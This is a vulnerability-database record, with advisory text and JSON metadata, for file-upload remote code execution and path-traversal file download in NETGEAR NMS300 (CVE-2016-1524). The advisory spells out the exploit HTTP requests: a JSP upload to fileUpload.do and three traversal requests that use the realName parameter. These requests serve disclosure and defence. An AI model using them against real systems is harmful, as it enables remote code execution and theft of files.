var-201602-0192
Vulnerability from variot

Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP file, and then accessing it via a direct request for a /null URI. A directory traversal vulnerability enables authenticated users to download arbitrary files: an arbitrary file may be read through the realName parameter when it includes .. (dot dot) sequences. Supplementary information: the vulnerability type has been identified as CWE-434: Unrestricted Upload of File with Dangerous Type. The Netgear Management System NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable.

>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300

> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)

Disclosure: 04/02/2016 / Last updated: 04/02/2016

Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."

Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has two serious vulnerabilities that can be exploited by a remote attacker.

A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello World Example</title>
</head>
<body>
<h2>A Hello World Example of JSP.</h2>
</body>
</html>
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--

#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:

a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla

b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1):
POST /data/getPage.do?method=getPageList&type=configImgManager
everyPage=10000

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}

c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export&imageId=<ID>

Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any untrusted networks.

References: [1] https://www.kb.cert.org/vuls/id/777024

================ Agile Information Security Limited http://www.agileinfosec.co.uk/

Enabling secure digital business >>



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0192",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "prosafe network management system nms300",
        "scope": "lte",
        "trust": 1.6,
        "vendor": "net gear",
        "version": "1.5.0.11"
      },
      {
        "model": "prosafe network management software 300",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "netgear",
        "version": "1.5.0.11"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "netgear",
        "version": null
      },
      {
        "model": "management system nms300",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "netgear",
        "version": "\u003c=1.5.0.11"
      },
      {
        "model": "prosafe network management software 300",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "netgear",
        "version": "1.5.0.11"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#777024"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:netgear:prosafe_network_management_software_300",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Pedro Ribeiro of Agile Information Security.",
    "sources": [
      {
        "db": "BID",
        "id": "82630"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-1524",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "id": "CVE-2016-1524",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.8,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-1524",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "id": "CNVD-2016-00972",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "id": "VHN-90343",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:A/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2016-1524",
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-1524",
            "trust": 1.6,
            "value": "High"
          },
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2016-1524",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-00972",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201602-129",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-90343",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-1524",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP file, and then accessing it via a direct request for a /null URI. A directory traversal vulnerability enables authenticated users to download arbitrary files. ( Dot dot ) including realName An arbitrary file may be read through the parameter. Supplementary information : CWE Vulnerability type by CWE-434: Unrestricted Upload of File with Dangerous Type ( Unlimited upload of dangerous types of files ) Has been identified. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. \nNetgear Management System NMS300 1.5.0.11 and prior are vulnerable. \u003e\u003e Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)\n==========================================================================\nDisclosure: 04/02/2016 / Last updated: 04/02/2016\n\n\n\u003e\u003e Background on the affected product:\n\"NMS300\nProSAFE\u00ae Network Management System\nDiagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network.\"\n\n\n\u003e\u003e Summary:\nNetgear\u0027s NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. \n\nA special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. 
Two new Metasploit modules that exploit these vulnerabilities have been released. \nSo for example if [name] = \"testing\" and [extension] = \".jsp\", the final file will be named \"nulltesting.jsp\". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. \n\nPOST /lib-1.0/external/flash/fileUpload.do HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\n\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\nContent-Disposition: form-data; name=\"name\"\n\n[name]\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"whatever.[extension]\"\nContent-Type: application/octet-stream\n\n\u003c%@ page language=\"java\" contentType=\"text/html; charset=ISO-8859-1\"\npageEncoding=\"ISO-8859-1\"%\u003e\n\u003c!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n\u003chtml\u003e\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=ISO-8859-1\"\u003e\n\u003ctitle\u003eHello World Example\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003ch2\u003eA Hello World Example of JSP.\u003c/h2\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--\n\n\n#2\nVulnerability: Arbitrary file download (authenticated)\nCVE-2016-1524\nAffected versions:\nNMS300 1.5.0.11\nNMS300 1.5.0.2\nNMS300 1.4.0.17\nNMS300 1.1.0.13\n\nThree steps need to be taken in order to exploit this vulnerability:\na) Add a configuration image, with the realName parameter containing the path traversal to the target file:\nPOST /data/config/image.do?method=add HTTP/1.1\nrealName=../../../../../../../../../../\u003cfile on C:\\\u003e\u0026md5=\u0026fileName=\u003cimagename.img\u003e\u0026version=1337\u0026vendor=Netgear\u0026deviceType=4\u0026deviceModel=FS526Tv2\u0026description=bla\n\nb) Obtain the file identifier (imageId) for the image that was 
created by scraping the page below for \"imagename.img\" (the fileName parameter in step 1):\nPOST /data/getPage.do?method=getPageList\u0026type=configImgManager\neveryPage=10000\n\nSample response:\n{\"page\":{\"beginIndex\":0,\"recordCount\":7,\"totalRecords\":7,\"currentPage\":1,\"everyPage\":10,\"totalPage\":1},\"list\":[{\"imageId\":\"1\",\"fileName\":\"agga5.img\",\"createTime\":\"10/03/2015 21:12:36\",\"realFileName\":\"../../../../../../../../../../log.txt\",\"vendor\":\"Netgear\",\"deviceType\":\"4\",\"deviceModel\":\"FS526Tv2\",\"version\":\"2323\",\"sizeM\":\"24491\",\"createBy\":\"admin\",\"createId\":\"1\",\"description\":\"bla\\r\\n\"}\n\nc) Download the file with the imageId obtained in step 2:\nGET /data/config/image.do?method=export\u0026imageId=\u003cID\u003e\n\n\n\u003e\u003e Fix: \nNo fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. \n\n\n\u003e\u003e References:\n[1] https://www.kb.cert.org/vuls/id/777024\n\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-1524"
      },
      {
        "db": "CERT/CC",
        "id": "VU#777024"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "BID",
        "id": "82630"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "db": "PACKETSTORM",
        "id": "135618"
      }
    ],
    "trust": 4.14
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-90343",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39412",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#777024",
        "trust": 5.2
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1524",
        "trust": 4.4
      },
      {
        "db": "JVN",
        "id": "JVNVU96743693",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "135618",
        "trust": 1.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "39412",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "82630",
        "trust": 0.3
      },
      {
        "db": "VULHUB",
        "id": "VHN-90343",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#777024"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "db": "BID",
        "id": "82630"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "db": "PACKETSTORM",
        "id": "135618"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "id": "VAR-201602-0192",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90343"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:52:41.712000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NETGEAR Download Center - NMS300",
        "trust": 1.6,
        "url": "http://downloadcenter.netgear.com/en/product/NMS300#searchResults"
      },
      {
        "title": "Patch for NetgearManagementSystemNMS300 arbitrary file upload vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/71362"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2016/02/07/no_patches_for_code_exec_holes_in_netgear_management_box/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-22",
        "trust": 0.8
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 4.5,
        "url": "http://www.kb.cert.org/vuls/id/777024"
      },
      {
        "trust": 4.2,
        "url": "http://seclists.org/fulldisclosure/2016/feb/30"
      },
      {
        "trust": 1.7,
        "url": "http://downloadcenter.netgear.com/en/product/nms300#"
      },
      {
        "trust": 1.6,
        "url": "http://jvn.jp/vu/jvnvu96743693/"
      },
      {
        "trust": 1.3,
        "url": "https://www.exploit-db.com/exploits/39412/"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/archive/1/537446/100/0/threaded"
      },
      {
        "trust": 1.2,
        "url": "http://packetstormsecurity.com/files/135618/netgear-pro-nms-300-code-execution-file-download.html"
      },
      {
        "trust": 0.8,
        "url": "https://cwe.mitre.org/data/definitions/434.html"
      },
      {
        "trust": 0.8,
        "url": "https://cwe.mitre.org/data/definitions/22.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1525"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1525"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1524"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1524"
      },
      {
        "trust": 0.3,
        "url": "http://www.netgear.com"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/auxiliary/admin/http/netgear_auth_download"
      },
      {
        "trust": 0.1,
        "url": "https://www.theregister.co.uk/2016/02/07/no_patches_for_code_exec_holes_in_netgear_management_box/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1525"
      },
      {
        "trust": 0.1,
        "url": "http://[host]:8080/null[name].[extension]."
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1524"
      },
      {
        "trust": 0.1,
        "url": "http://www.agileinfosec.co.uk/)"
      },
      {
        "trust": 0.1,
        "url": "http://www.agileinfosec.co.uk/"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#777024"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "db": "BID",
        "id": "82630"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "db": "PACKETSTORM",
        "id": "135618"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#777024"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "db": "BID",
        "id": "82630"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "db": "PACKETSTORM",
        "id": "135618"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-02-03T00:00:00",
        "db": "CERT/CC",
        "id": "VU#777024"
      },
      {
        "date": "2016-02-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "date": "2016-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "date": "2016-02-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "date": "2016-02-03T00:00:00",
        "db": "BID",
        "id": "82630"
      },
      {
        "date": "2016-02-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "date": "2016-03-15T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "date": "2016-02-07T17:10:18",
        "db": "PACKETSTORM",
        "id": "135618"
      },
      {
        "date": "2016-02-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      },
      {
        "date": "2016-02-13T02:59:09.900000",
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-02-04T00:00:00",
        "db": "CERT/CC",
        "id": "VU#777024"
      },
      {
        "date": "2016-02-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-00972"
      },
      {
        "date": "2018-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90343"
      },
      {
        "date": "2018-10-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-1524"
      },
      {
        "date": "2016-07-05T21:22:00",
        "db": "BID",
        "id": "82630"
      },
      {
        "date": "2016-02-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001517"
      },
      {
        "date": "2016-03-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001708"
      },
      {
        "date": "2016-03-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      },
      {
        "date": "2024-11-21T02:46:36.043000",
        "db": "NVD",
        "id": "CVE-2016-1524"
      }
    ]
  },
  "threat_type": {
    "@context": {
